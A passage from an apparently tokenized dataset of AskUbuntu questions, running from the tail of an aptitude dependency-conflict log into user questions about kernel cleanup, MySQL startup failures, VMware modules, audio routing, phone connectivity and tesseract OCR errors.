consolekit { a } dbus { a } dbus-x11 default-jre-headless { a } defoma { a } desktop-file-utils { a } dictionaries-common { a } docbook-xml { a } ecj { a } ecj-gcj esound-clients { a } esound-common { a } evolution-data-server { a } evolution-data-server-common { a } fastjar fontconfig { a } fontconfig-config { a } gamin { a } gawk gcj-4.4-base { a } gcj-4.4-jdk { a } gcj-4.4-jre { a } gcj-4.4-jre-headless { a } gcj-4.4-jre-lib { a } gcj-jdk gcj-jre { a } gcj-jre-headless { a } gconf2 { a } gconf2-common { a } ghostscript { a } gnome-about { a } gnome-applets { a } gnome-applets-data { a } gnome-control-center { a } gnome-desktop-data { a } gnome-doc-utils { a } gnome-icon-theme { a } gnome-keyring { a } gnome-media { a } gnome-media-common { a } gnome-menus { a } gnome-mime-data { a } gnome-panel { a } gnome-panel-data { a } gnome-session { a } gnome-session-bin { a } gnome-settings-daemon { a } gnome-system-monitor { a } gnome-user-guide { a } gsfonts { a } gstreamer0.10-plugins-base { a } gstreamer0.10-plugins-good { a } gstreamer0.10-pulseaudio { a } gstreamer0.10-x { a } gvfs { a } gvfs-backends { a } hicolor-icon-theme { a } hunspell-en-us { a } icedtea-6-jre-cacao { a } indicator-applet { a } indicator-application { a } indicator-messages { a } indicator-sound { a } java-common { a } krb5-multidev { a } launchpad-integration { a } libaa1 { a } libantlr-java { a } libappindicator0 { a } libarchive1 { a } libart-2.0-2 { a } libasound2 { a } libasound2-dev libasound2-plugins { a } libaspell15 { a } libatasmart4 { a } libatk1.0-0 { a } libatk1.0-data { a } libatk1.0-dev { a } libatspi1.0-0 { a } libaudiofile0 { a } libavahi-client-dev { a } libavahi-client3 { a } libavahi-common-data { a } libavahi-common-dev { a } libavahi-common3 { a } libavahi-glib1 { a } libavc1394-0 { a } libbluetooth3 { a } libbonobo2-0 { a } libbonobo2-common { a } libbonoboui2-0 { a } libbonoboui2-common { a } libcaca0 { a } libcairo2 { a } libcairo2-dev { a } libcairomm-1.0-1 { a } libcamel1.2-14 { a } libcanberra-gtk-module { a } libcanberra-gtk0 { a } libcanberra0 { a } libcdio-cdda0 { a } libcdio-paranoia0 { a } libcdio10 { a } libcdparanoia0 { a } libck-connector0 { a } libcups2 { a } libcups2-dev libcupsimage2 { a } libdatrie1 { a } libdbus-1-dev { a } libdbusmenu-glib1 { a } libdbusmenu-gtk1 { a } libdevkit-power-gobject1 { a } libdirectfb-1.2-0 { a } libdirectfb-dev { a } libdirectfb-extra { a } libdv4 { a } libebackend1.2-0 { a } libebook1.2-9 { a } libecal1.2-7 { a } libecj-java { a } libecj-java-gcj { a } libedata-book1.2-2 { a } libedata-cal1.2-6 { a } libedataserver1.2-11 { a } libedataserverui1.2-8 { a } libeggdbus-1-0 { a } libegroupwise1.2-13 { a } libenchant1c2a { a } libesd0 { a } libexempi3 { a } libexif12 { a } libexpat1-dev { a } libffi-dev libflac8 { a } libfontconfig1 { a } libfontconfig1-dev { a } libfontenc1 { a } libfreetype6-dev libgail18 { a } libgamin0 { a } libgcj-bc { a } libgcj-common { a } libgcj10 { a } libgcj10-awt { a } libgcj10-dev { a } libgconf2-4 { a } libgcr0 { a } libgdata-google1.2-1 { a } libgdata1.2-1 { a } libgdu0 { a } libgif-dev libgif4 { a } libgksu2-0 { a } libgl1-mesa-dri libgl1-mesa-glx { a } libglade2-0 { a } libglib2.0-data { a } libglibmm-2.4-1c2a { a } libglu1-mesa { a } libgnome-desktop-2-17 { a } libgnome-keyring0 { a } libgnome-media0 { a } libgnome-menu2 { a } libgnome-window-settings1 { a } libgnome2-0 { a } libgnome2-common { a } libgnomecanvas2-0 { a } libgnomecanvas2-common { a } libgnomekbd-common { a } libgnomekbd4 { a } libgnomeui-0 { a } libgnomeui-common { a } libgnomevfs2-0 { a } libgnomevfs2-common { a } libgnutls-dev { a } libgp11-0 { a } libgpg-error-dev { a } libgphoto2-2 { a } libgphoto2-port0 { a } libgs8 { a } libgsf-1-114 { a } libgsf-1-common { a } libgssrpc4 { a } libgstreamer-plugins-base0.10-0 { a } libgstreamer0.10-0 { a } libgtk2.0-0 { a } libgtk2.0-bin { a } libgtk2.0-common { a } libgtk2.0-dev libgtkmm-2.4-1c2a { a } libgtop2-7 { a } libgtop2-common { a } libgucharmap7 { a } libgudev-1.0-0 { a } libgvfscommon0 { a } libgweather-common { a } libgweather1 { a } libhal-storage1 { a } libhal1 { a } libhunspell-1.2-0 { a } libical0 { a } libice-dev { a } libice6 { a } libidl0 { a } libido-0.1-0 { a } libiec61883-0 { a } libimobiledevice0 { a } libindicate4 { a } libindicator0 { a } libjack0 { a } libjasper1 { a } libjaxp1.3-java { a } libjline-java { a } libjpeg62 { a } libjpeg62-dev libjson-glib-1.0-0 { a } libkadm5clnt-mit7 { a } libkadm5srv-mit7 { a } libkdb5-4 { a } libkrb5-dev { a } liblaunchpad-integration1 { a } liblcms1 { a } libltdl-dev { a } libltdl7 { a } libmagickcore2 { a } libmagickwand2 { a } libmetacity-private0 { a } libnautilus-extension1 { a } libnotify1 { a } libnspr4-dev { a } libnss3-dev libntfs10 { a } libogg0 { a } liboil0.3 { a } libopenobex1 { a } liborbit2 { a } libpam-ck-connector { a } libpam-gnome-keyring { a } libpanel-applet2-0 { a } libpango1.0-0 { a } libpango1.0-common { a } libpango1.0-dev { a } libpangomm-1.4-1 { a } libpaper-utils { a } libpaper1 { a } libpixman-1-0 { a } libpixman-1-dev { a } libplist1 { a } libpng12-dev libpolkit-agent-1-0 { a } libpolkit-backend-1-0 { a } libpolkit-gobject-1-0 { a } libproxy0 { a } libpthread-stubs0 { a } libpthread-stubs0-dev { a } libpulse-browse0 { a } libpulse-dev libpulse-mainloop-glib0 { a } libpulse0 { a } librarian0 { a } libraw1394-11 { a } librsvg2-2 { a } librsvg2-common { a } libsamplerate0 { a } libsexy2 { a } libsgutils2-2 { a } libshout3 { a } libsm-dev { a } libsm6 { a } libsmbclient { a } libsndfile1 { a } libsoup-gnome2.4-1 { a } libsoup2.4-1 { a } libspeex1 { a } libspeexdsp1 { a } libstartup-notification0 { a } libsysfs-dev { a } libsysfs2 { a } libtag1-vanilla { a } libtag1c2a { a } libtalloc2 { a } libtasn1-3-dev { a } libtdb1 { a } libthai-data { a } libthai0 { a } libtheora0 { a } libtiff4 { a } libtool libts-0.0-0 { a } libunique-1.0-0 { a } libusb-1.0-0 { a } libusbmuxd1 { a } libv4l-0 { a } libvisual-0.4-0 { a } libvisual-0.4-plugins { a } libvorbis0a { a } libvorbisenc2 { a } libvorbisfile3 { a } libwavpack1 { a } libwbclient0 { a } libwnck-common { a } libwnck22 { a } libx11-dev { a } libxau-dev { a } libxaw7 { a } libxaw7-dev libxcb-atom1 { a } libxcb-aux0 { a } libxcb-event1 { a } libxcb-render-util0 { a } libxcb-render-util0-dev { a } libxcb-render0 { a } libxcb-render0-dev { a } libxcb1-dev { a } libxcomposite-dev { a } libxcomposite1 { a } libxcursor-dev { a } libxcursor1 { a } libxdamage-dev { a } libxdamage1 { a } libxdmcp-dev { a } libxerces2-java { a } libxext-dev { a } libxfixes-dev { a } libxfixes3 { a } libxfont1 { a } libxft-dev { a } libxft2 { a } libxi-dev libxi6 { a } libxinerama-dev libxinerama1 { a } libxkbfile1 { a } libxklavier16 { a } libxml2-utils { a } libxmu-dev { a } libxmu-headers { a } libxmu6 { a } libxpm-dev { a } libxpm4 { a } libxrandr-dev { a } libxrandr2 { a } libxrender-dev libxrender1 { a } libxres1 { a } libxslt1.1 { a } libxss1 { a } libxt-dev libxt6 { a } libxtst-dev libxtst6 { a } libxv1 { a } libxxf86dga1 { a } libxxf86misc1 { a } libxxf86vm1 { a } m4 mauve metacity metacity-common { a } mousetweaks { a } mtools { a } nautilus { a } nautilus-data { a } notification-daemon { a } ntfsprogs { a } obex-data-server { a } openjdk-6-jre-headless { a } openjdk-6-jre-lib { a } pkg-config policykit-1 { a } policykit-1-gnome { a } psfontmgr { a } pulseaudio { a } pulseaudio-esound-compat { a } pulseaudio-module-x11 { a } pulseaudio-utils { a } python-cairo { a } python-gconf { a } python-gmenu { a } python-gnome2 { a } python-gnomeapplet { a } python-gnomecanvas { a } python-gtk2 { a } python-libxml2 { a } python-pyorbit { a } python-xdg { a } python-xkit { a } rarian-compat { a } rhino rtkit { a } screen-resolution-extra { a } scrollkeeper { a } sgml-data { a } shared-mime-info { a } sharutils tsconf { a } ttf-dejavu-core { a } ubuntu-system-service { a } udisks { a } usbmuxd { a } x-ttcidfont-conf { a } x11-common { a } x11-utils { a } x11-xkb-utils x11proto-composite-dev { a } x11proto-core-dev { a } x11proto-damage-dev { a } x11proto-fixes-dev { a } x11proto-input-dev { a } x11proto-kb-dev { a } x11proto-randr-dev { a } x11proto-record-dev { a } x11proto-render-dev { a } x11proto-xext-dev { a } x11proto-xinerama-dev { a } xfonts-base xfonts-encodings { a } xfonts-utils { a } xserver-common { a } xsltproc xtrans-dev { a } xulrunner-1.9.2 { a } xvfb yelp { a } zenity { a } 0 packages upgraded , 444 newly installed , 0 to remove and 0 not upgraded . need to get 198mb of archives . after unpacking 857mb will be used . the following packages have unmet dependencies : comerr-dev : depends : libcomerr2 ( = 1.41.11-1ubuntu2 ) but 1.41.11-1ubuntu2.1 is installed . tzdata-java : depends : tzdata ( = 2010i-1 ) but 2012e-0ubuntu0.10.04 is installed . libglib2.0-dev : depends : libglib2.0-0 ( = 2.24.0-0ubuntu4 ) but 2.24.1-0ubuntu2 is installed . libgcrypt11-dev : depends : libgcrypt11 ( = 1.4.4-5ubuntu2 ) but 1.4.4-5ubuntu2.1 is installed . the following actions will resolve these dependencies : downgrade the following packages : libcomerr2 [ 1.41.11-1ubuntu2.1 ( now ) - > 1.41.11-1ubuntu2 ( lucid ) ] libgcrypt11 [ 1.4.4-5ubuntu2.1 ( now ) - > 1.4.4-5ubuntu2 ( lucid ) ] libglib2.0-0 [ 2.24.1-0ubuntu2 ( now ) - > 2.24.0-0ubuntu4 ( lucid ) ] tzdata [ 2012e-0ubuntu0.10.04 ( now ) - > 2010i-1 ( lucid ) ] leave the following dependencies unresolved : ecj-gcj recommends java-gcj-compat ( > = 1.0.69 ) score is -27 accept this solution ? [ y/n/q/ ? ] it also happens when trying to install prebuilt jdk , as described in the same build instructions : $ sudo aptitude install openjdk-6-jdk libmotif-dev reading package lists ... building dependency tree ... reading state information ... reading extended state information ... initializing package states ... the following packages are broken : tzdata-java the following new packages will be installed : ca-certificates-java { a } icedtea-6-jre-cacao { a } icedtea-netx { a } java-common { a } libasound2 { a } libavahi-client3 { a } libavahi-common-data { a } libavahi-common3 { a } libcups2 { a } libflac8 { a } libgif4 { a } libice-dev { a } libice6 { a } libjpeg62 { a } libmotif-dev libmotif3 { a } libogg0 { a } libpthread-stubs0 { a } libpthread-stubs0-dev { a } libpulse0 { a } libsm-dev { a } libsm6 { a } libsndfile1 { a } libvorbis0a { a } libvorbisenc2 { a } libx11-dev { a } libxau-dev { a } libxcb1-dev { a } libxdmcp-dev { a } libxi6 { a } libxmu6 { a } libxp6 { a } libxrender1 { a } libxt-dev { a } libxt6 { a } libxtst6 { a } openjdk-6-jdk openjdk-6-jre { a } openjdk-6-jre-headless { a } openjdk-6-jre-lib { a } ttf-dejavu-core { a } ttf-dejavu-extra { a } x11-common { a } x11proto-core-dev { a } x11proto-input-dev { a } x11proto-kb-dev { a } xtrans-dev { a } 0 packages upgraded , 48 newly installed , 0 to remove and 0 not upgraded . need to get 60.3mb of archives . after unpacking 168mb will be used . the following packages have unmet dependencies : tzdata-java : depends : tzdata ( = 2010i-1 ) but 2012e-0ubuntu0.10.04 is installed . the following actions will resolve these dependencies : downgrade the following packages : tzdata [ 2012e-0ubuntu0.10.04 ( now ) - > 2010i-1 ( lucid ) ] score is 80 accept this solution ? [ y/n/q/ ? ]
296924	how to automatically uninstall older kernels so that `` the volume 'boot ' has only ... mb disk space '' does not appear ?	i work with ubuntu 13.04 ( `` 64-bit pc ( amd64 ) desktop image '' ) . on updates/upgrades , i quite often get messages of the type the volume `` boot '' has only 11 mb disk space . i then uninstall older kernel version to free some space on the boot partition . is it possible to automatically remove unused , older kernels when doing sudo apt-get upgrade ?
296928	ubuntu one signon problems	i am trying to log into ubuntu one but it keeps telling me get/head request should not include body what does this mean and how can i sign in ?
296932	is there a way to disable one wireless adapter if any other is present ?	title 's pretty specific , but ... i have an intel wlan a/g/n card that came with the laptop internally . i have a netgear usb dongle i use for my wifi on occasion , and it works better than the card on my system . is there a way to tell the system to automatically disable the intel wifi adapter and enable the netgear adapter if it 's present ? and to expand this , is it possible to configure the system to disable the intel card if any other wireless adapter is present ? a guide to what to do would be helpful , because this is something i have n't worked with before ...
296942	`` there was a error launching the application ''	i have a .desktop file for sublime text and i keep getting a error when executing it . here is the desktop file : [ desktop entry ] encoding=utf-8 version=1.0 type=application terminal=false exec=/home/shirwa/sublime text 2/sublime_text name=sublime text icon=/home/shirwa/sublime text 2/icon/48x48/sublime_text.png
296946	upstart ca n't start mysql	after an installation of mysql , i get a few errors and i ca n't run the mysql daemon . i 've tried uninstalling and reinstalling several times , and i 'm not sure what 's going on . here 's a snippit of what i 'm seeing : setting up mysql-server-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... runlevel : /var/run/utmp : no such file or directory initctl : unknown job : mysql sudo service mysql start gives me an unknown job error , and mysqld is n't found on my system . i 'm not sure where to go from here , aside from maybe compiling from source and creating my own upstart script . of course , i 'd like to do things the easy way if possible . how can i successfully run mysql or fix this problem ? here is the complete log of what happens when i run the installation command : sudo apt-get install mysql-server reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libaio1 libdbd-mysql-perl libdbi-perl libnet-daemon-perl libplrpc-perl libterm-readkey-perl mysql-client-5.5 mysql-client-core-5.5 mysql-server-5.5 mysql-server-core-5.5 suggested packages : tinyca mailx the following new packages will be installed : libaio1 libdbd-mysql-perl libdbi-perl libnet-daemon-perl libplrpc-perl libterm-readkey-perl mysql-client-5.5 mysql-client-core-5.5 mysql-server mysql-server-5.5 mysql-server-core-5.5 0 upgraded , 11 newly installed , 0 to remove and 13 not upgraded . need to get 0 b/25.4 mb of archives . after this operation , 88.0 mb of additional disk space will be used . do you want to continue [ y/n ] ? y preconfiguring packages ... selecting previously unselected package libaio1 : i386 . ( reading database ... 159063 files and directories currently installed . ) unpacking libaio1 : i386 ( from ... /libaio1_0.3.109-3_i386.deb ) ... selecting previously unselected package libnet-daemon-perl . unpacking libnet-daemon-perl ( from ... /libnet-daemon-perl_0.48-1_all.deb ) ... selecting previously unselected package libplrpc-perl . unpacking libplrpc-perl ( from ... /libplrpc-perl_0.2020-2_all.deb ) ... selecting previously unselected package libdbi-perl . unpacking libdbi-perl ( from ... /libdbi-perl_1.622-1_i386.deb ) ... selecting previously unselected package libdbd-mysql-perl . unpacking libdbd-mysql-perl ( from ... /libdbd-mysql-perl_4.021-1_i386.deb ) ... selecting previously unselected package mysql-client-core-5.5 . unpacking mysql-client-core-5.5 ( from ... /mysql-client-core-5.5_5.5.31-0ubuntu0.13.04.1_i386.deb ) ... selecting previously unselected package libterm-readkey-perl . unpacking libterm-readkey-perl ( from ... /libterm-readkey-perl_2.30-4build4_i386.deb ) ... selecting previously unselected package mysql-client-5.5 . unpacking mysql-client-5.5 ( from ... /mysql-client-5.5_5.5.31-0ubuntu0.13.04.1_i386.deb ) ... selecting previously unselected package mysql-server-core-5.5 . unpacking mysql-server-core-5.5 ( from ... /mysql-server-core-5.5_5.5.31-0ubuntu0.13.04.1_i386.deb ) ... selecting previously unselected package mysql-server-5.5 . unpacking mysql-server-5.5 ( from ... /mysql-server-5.5_5.5.31-0ubuntu0.13.04.1_i386.deb ) ... selecting previously unselected package mysql-server . unpacking mysql-server ( from ... /mysql-server_5.5.31-0ubuntu0.13.04.1_all.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... setting up libaio1 : i386 ( 0.3.109-3 ) ... setting up libnet-daemon-perl ( 0.48-1 ) ... setting up libplrpc-perl ( 0.2020-2 ) ... setting up libdbi-perl ( 1.622-1 ) ... setting up libdbd-mysql-perl ( 4.021-1 ) ... setting up mysql-client-core-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... setting up libterm-readkey-perl ( 2.30-4build4 ) ... setting up mysql-client-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... setting up mysql-server-core-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... setting up mysql-server-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... runlevel : /var/run/utmp : no such file or directory initctl : unknown job : mysql runlevel : /var/run/utmp : no such file or directory initctl : unknown job : mysql setting up mysql-server ( 5.5.31-0ubuntu0.13.04.1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place here are the contents of /var/log/mysql/error.log immediately after the apt-get command is run to install it . 130518 12:14:36 [ note ] plugin 'federated ' is disabled . 130518 12:14:36 innodb : the innodb memory heap is disabled 130518 12:14:36 innodb : mutexes and rw_locks use gcc atomic builtins 130518 12:14:36 innodb : compressed tables use zlib 1.2.7 130518 12:14:36 innodb : using linux native aio 130518 12:14:36 innodb : initializing buffer pool , size = 128.0m 130518 12:14:36 innodb : completed initialization of buffer pool 130518 12:14:36 innodb : highest supported file format is barracuda . 130518 12:14:36 innodb : waiting for the background threads to start 130518 12:14:37 innodb : 5.5.31 started ; log sequence number 1595675 130518 12:14:37 innodb : starting shutdown ... 130518 12:14:38 innodb : shutdown completed ; log sequence number 1595675 130518 12:14:38 [ note ] plugin 'federated ' is disabled . 130518 12:14:38 innodb : the innodb memory heap is disabled 130518 12:14:38 innodb : mutexes and rw_locks use gcc atomic builtins 130518 12:14:38 innodb : compressed tables use zlib 1.2.7 130518 12:14:38 innodb : using linux native aio 130518 12:14:38 innodb : initializing buffer pool , size = 128.0m 130518 12:14:38 innodb : completed initialization of buffer pool 130518 12:14:38 innodb : highest supported file format is barracuda . 130518 12:14:38 innodb : waiting for the background threads to start 130518 12:14:39 innodb : 5.5.31 started ; log sequence number 1595675 error : 1064 you have an error in your sql syntax ; check the manual that corresponds to your mysql server version for the right syntax to use near 'al ter table user add column show_view_priv enum ( 'n ' , 'y ' ) character set utf8 not ' at line 1 130518 12:14:39 [ error ] aborting 130518 12:14:39 innodb : starting shutdown ... 130518 12:14:40 innodb : shutdown completed ; log sequence number 1595675 130518 12:14:40 [ note ] /usr/sbin/mysqld : shutdown complete
296948	why ca n't i login after ubuntu is installed on my vm ?	i just installed ubuntu 12.10 on vmware player 5 on windows 8 . during the installation , it asks for my name , username and password ( requiring a confirm on that password ) . when everything is done , a graphical login screen comes up with login and remote login choices . i enter my username and password i just established and it says `` invalid password , please try again '' . i have been through this like 5 times and every time the same thing . why ca n't i login with the username/password i just established ? caps lock and number lock are not on . edit i see installed perfectly but password not working for login or authentication is sort of like mine . or at least some of the suggestions for that one are probably worth considering for this one .
296950	how can i specify which programs play sound through headphones and which ones play through speakers ?	when i used windows ( sorry for bringing it up , ) i could specify in the sound control menu which programs i wanted playing through which speakers . for example , i could have skype playing through my headphones , while having a game playing sound through my loudspeakers . now , i know that this is possible using some virtual output options , but i have another problem : on linux , whether i select `` headphones '' or `` analog output '' , the sound goes through my headphones if they 're plugged in , and the only way to use my speakers is by unplugging them . i 'm using the headphone port on the front of my case , and the audio port on the back of my motherboard , and i do n't have a dedicated sound card , so i know this might be a hardware issue . however , i know it 's possible , because i was able to do it through windows . a few more details : i 'm currently using pulseaduio , but i 'd be happy to ditch it . i 'm using kubuntu . finally , i want to clarify , as i 've seen some people answer others incorrectly due to a lack of understanding : i do not want to mirror my sound across both devices . i want some applications to play through my speakers , and other apps to play through my headphones .
296959	vmware stopped working after i upgraded . ( vmware kernel module updater )	it asks for the newest kernel headers ( 3.8.0-21-generic ) , so i downloaded them . after pointing to the new path for the file it still does not work . i have tried many solutions but none were successful . this is my first time posting a question , so please tell me if you need more information . thanks in advance ! i have followed [ these instructions ] ( unable to start vmware workstation after upgrade to 13.04 ) but `` sudo ln -s ../generated/uapi/linux/version.h '' yields , `` ln : failed to create symbolic link ‘./utsrelease.h’ : file exists '' . so i ran , `` sudo ln -sf ../generated/uapi/linux/version.h '' but it does n't appear to do anything . i tried http : //askubuntu.com/a/296551/159739 but i get , `` ln : failed to create symbolic link ‘./version.h’ : file exists '' update : now when i try to launch vmware a pop up reads , `` before you can run vmware , several modules must be compiled and loaded into the running kernel . '' cancel/install . when i select to install it just closes .
296961	wine shows its applications three times in the 'open with ' dialog	today i noticed that wine is listing its applications many times when i go to the 'open with other application ... ' dialog . it is very strange . where are these symbolic links stored which are shown in the dialog ? how can i edit it to remove the needless ones ? please help .
296962	how can i connect my samsung s3 mini to ubuntu 12.10	i have tried many things including the installation of gmtp from ubuntu 's ppa , and with it many other that include mtp-dev ... i have forgotten now the bunch of files i have installed . the problem is that when i plug my s3mini into my computer it is not recognized , however if i change the way of connecting form mtp to ppt ( i believe is ppt the other way ) it does connect , and if i go back to mtp again it does connect . the problem is that i can not move big files from and into my cellphone 's internal storage . i know and i use airdroid for small files , i have dropbox but my internet is limited and slow , and both options ( airdroid and dropbox ) take years in copying a movie onto the cellphone .
296966	google earth closing suddenly in ubuntu 13.04	google earth closing suddenly in ubuntu . i ca n't figure out why it is happening..but the err log is ... [ 0518/102428 : error : net_util.cc ( 2195 ) ] not implemented reached in bool net : :haveonlyloopbackaddresses ( ) [ 0518/102428 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102433 : error : nss_ocsp.cc ( 581 ) ] no urlrequestcontext for ocsp handler . [ 0518/102433 : error : nss_ocsp.cc ( 581 ) ] no urlrequestcontext for ocsp handler . [ 0518/102438 : error : nss_ocsp.cc ( 581 ) ] no urlrequestcontext for ocsp handler . [ 0518/102439 : error : nss_ocsp.cc ( 581 ) ] no urlrequestcontext for ocsp handler . [ 0518/102440 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1594 ) ] messed up entry found . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102442 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102444 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102456 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . [ 0518/102457 : warning : backend_impl.cc ( 1875 ) ] destroying invalid entry . another crash happened while handling crash ! help ... thanks ...
296969	sudo apt-get not working after a new install of ubuntu	i installed ubuntu last night . and after reading 100s of posts , i still could n't make my sudo apt-get work at all . i remember , i have to modify the software server somehow . but i ca n't remember how or where to do it . nothing is being installed . need help .
296970	is privacy 's delete history button supposed to delete nautilus ' recent items ?	i 've opened two files and deleted the last hour history , in recent items ' tab , in privacy options ( ubuntu 13.04 ) . however , nautilus keeps showing the two files in recent files . i 've found the .local/share/recently-used.xbel file , from where i can manually remove the files reference , but i think deleting the last hour history should have done it automatically , should n't it ?
296971	secondary monitor goes off upon logging in	i am using dell xps 14z laptop with ubuntu 12.04 , when booting up it detects the secondary monitor [ viewsonic ] but upon entering the username/password , the secondary monitor goes blank . when i open system settings -- > displays , it does not even detect the secondary monitor which it detected initially , what could be the problem and how do i debug this ? thanks , praveen
296972	convertion of tiff image file to text	i 'm getting error while converting tiff image to text . here is my code import image import subprocess import util import errors tesseract_exe_name = 'tesseract ' # name of executable to be called at command line scratch_image_name = `` temp.bmp '' # this file must be .bmp or other tesseract-compatible format scratch_text_name_root = `` temp '' # leave out the .txt extension cleanup_scratch_flag = true # temporary files cleaned up after ocr operation def call_tesseract ( input_filename , output_filename ) : `` '' '' calls external tesseract.exe on input file ( restrictions on types ) , outputting output_filename+'txt ' '' '' '' args = [ tesseract_exe_name , input_filename , output_filename ] proc = subprocess.popen ( args ) retcode = proc.wait ( ) if retcode ! =0 : errors.check_for_errors ( ) def image_to_string ( im , cleanup = cleanup_scratch_flag ) : `` '' '' converts im to file , applies tesseract , and fetches resulting text . if cleanup=true , delete scratch files after operation . '' '' '' try : util.image_to_scratch ( im , scratch_image_name ) call_tesseract ( scratch_image_name , scratch_text_name_root ) text = util.retrieve_text ( scratch_text_name_root ) finally : if cleanup : util.perform_cleanup ( scratch_image_name , scratch_text_name_root ) return text def image_file_to_string ( filename , cleanup = cleanup_scratch_flag , graceful_errors=true ) : `` '' '' applies tesseract to filename ; or , if image is incompatible and graceful_errors=true , converts to compatible format and then applies tesseract . fetches resulting text . if cleanup=true , delete scratch files after operation . '' '' '' try : try : call_tesseract ( filename , scratch_text_name_root ) text = util.retrieve_text ( scratch_text_name_root ) except errors.tesser_general_exception : if graceful_errors : im = image.open ( filename ) text = image_to_string ( im , cleanup ) else : raise finally : if cleanup : util.perform_cleanup ( scratch_image_name , scratch_text_name_root ) return text if __name__=='__main__ ' : im = image.open ( `` /home/oomsys/phototest.tif '' ) text = image_to_string ( im ) print text try : text = image_file_to_string ( 'fnord.tif ' , graceful_errors=false ) except errors.tesser_general_exception , value : print `` fnord.tif is incompatible filetype . try graceful_errors=true '' print value text = image_file_to_string ( 'fnord.tif ' , graceful_errors=true ) print `` fnord.tif contents : '' , text text = image_file_to_string ( 'fonts_test.png ' , graceful_errors=true ) print text here is my error traceback ( most recent call last ) : file `` pytesser.py '' , line 60 , in < module > text = image_to_string ( im ) file `` pytesser.py '' , line 31 , in image_to_string call_tesseract ( scratch_image_name , scratch_text_name_root ) file `` pytesser.py '' , line 21 , in call_tesseract proc = subprocess.popen ( args ) file `` /usr/lib/python2.7/subprocess.py '' , line 679 , in __init__ errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1239 , in _execute_child raise child_exception oserror : [ errno 2 ] no such file or directory
296976	upgrade from ubuntu 12.10 to 13.04 `` failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal ''	i am not able to upgrade to the latest version 13.04 . the error is : failed to download repository information check your internet connection . details w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) /dists/quantal/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) /dists/quantal/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , e : some index files failed to download . they have been ignored , or old ones used instead .
296988	ubuntu 12.4 on 3.4.45 kernel : ca n't access usb memory stick	i installed kernel version 3.4.45 [ lts ] on ubuntu 12.4 on a acer laptop . with this configuration , the usb memory drives ca n't be accessed , some details are follows . upon inserting the usb drive dmesg shows : [ 1327.354952 ] usb 2-1.3 : new high-speed usb device number 6 using ehci_hcd [ 1327.565368 ] usb 2-1.3 : new usb device found , idvendor=090c , idproduct=1000 [ 1327.565378 ] usb 2-1.3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1327.565385 ] usb 2-1.3 : product : usb disk [ 1327.565391 ] usb 2-1.3 : manufacturer : smi corporation [ 1327.565395 ] usb 2-1.3 : serialnumber : aa00000000001947 root @ ubuntu : /etc/udev/rules.d # lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 04f2 : b23d chicony electronics co. , ltd bus 002 device 004 : id 046d : c52a logitech , inc . bus 002 device 006 : id 090c:1000 silicon motion , inc. - taiwan ( formerly feiya technology corp. ) 64mb qdi u2 disk in the lsusb output above , the 